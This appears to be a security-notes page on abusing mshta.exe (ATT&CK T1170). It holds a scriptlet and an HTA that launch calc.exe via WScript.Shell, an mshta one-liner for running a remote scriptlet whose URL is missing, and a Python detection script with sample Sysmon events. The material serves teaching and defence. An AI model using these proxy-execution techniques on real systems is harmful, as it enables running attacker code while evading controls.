
T1170: MSHTA


Writing a scriptlet file that will launch calc.exe when invoked:

{% code-tabs %} {% code-tabs-item title="" %}

```xml
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
    function Exec() {
        var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); // launches calc.exe
    }
</script>
</scriptlet>
```
{% endcode-tabs-item %} {% endcode-tabs %}

Invoking the scriptlet file hosted remotely:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

```powershell
# from powershell
/cmd /c mshta.exe javascript:a=(GetObject("script:")).Exec();close();
```
{% endcode-tabs-item %} {% endcode-tabs %}


As expected, calc.exe is spawned by mshta.exe. Note that mshta and cmd exit almost immediately after invoking calc.exe.

As a defender, look at Sysmon logs for mshta establishing network connections.

Also look for suspicious command lines.
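A minimal triage of the two defender checks above (mshta network connections and suspicious command lines), plus the mshta parent/child relationship noted earlier, as an added example that is not from the original page. The events are constructed dicts using Sysmon Event ID 1 and 3 field names; `triage`, `run` and every sample value are hypothetical.

```python
import re

# Script-protocol handlers or remote URLs on an mshta command line.
SUSPICIOUS_CMD = re.compile(r"(javascript:|vbscript:|script:|https?://)")

def is_mshta(path):
    return (path or "").lower().endswith("\\mshta.exe")

def normalise(cmdline):
    # Lower-case and drop cmd.exe carets and quotes before matching.
    return re.sub(r'[\^"]', "", (cmdline or "").lower())

def triage(event):
    """Return findings for one Sysmon event (dict of its EventData fields)."""
    findings = []
    if event.get("EventID") == 3 and is_mshta(event.get("Image")):
        findings.append("mshta network connection to %s:%s"
                        % (event.get("DestinationIp"), event.get("DestinationPort")))
    if event.get("EventID") == 1:
        hit = SUSPICIOUS_CMD.search(normalise(event.get("CommandLine")))
        if is_mshta(event.get("Image")) and hit:
            findings.append("mshta command line contains " + hit.group(1))
        if is_mshta(event.get("ParentImage")):
            findings.append("process spawned by mshta: " + event.get("Image", "?"))
    return findings

MSHTA = r"C:\Windows\System32\mshta.exe"
# Constructed sample events (not real telemetry); 192.0.2.x are documentation addresses.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": MSHTA, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'mshta.exe javascript:a=(GetObject("script:http://192.0.2.10/x.sct")).Exec();close();'},
    {"EventID": 3, "Image": MSHTA, "DestinationIp": "192.0.2.10", "DestinationPort": 80},
    {"EventID": 1, "Image": r"C:\Windows\System32\calc.exe", "ParentImage": MSHTA,
     "CommandLine": "calc.exe"},
    {"EventID": 1, "Image": MSHTA, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Tools\help.hta"'},
    {"EventID": 3, "Image": r"C:\Program Files\App\app.exe",
     "DestinationIp": "192.0.2.20", "DestinationPort": 443},
]

def run(events):
    """Return (event index, finding) pairs for every event that triggers a rule."""
    return [(i, f) for i, e in enumerate(events) for f in triage(e)]

if __name__ == "__main__":
    for index, finding in run(SAMPLE_EVENTS):
        print(index, finding)
```

The fourth sample event, a local .hta opened from Explorer with no script handler or URL, produces no finding, so a rule on process name alone would be noisier than these three checks.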


The hta file can be invoked like so:


or by navigating to the file itself, launching it and clicking run:

{% code-tabs %} {% code-tabs-item title="" %}

```html
<html>
<script language="VBScript">
    Sub RunProgram
        Set objShell = CreateObject("Wscript.Shell")
        objShell.Run "calc.exe"
    End Sub
    RunProgram ' call the Sub when the HTA loads
</script>
<body>
    Nothing to see here..
</body>
</html>
```
{% endcode-tabs-item %} {% endcode-tabs %}

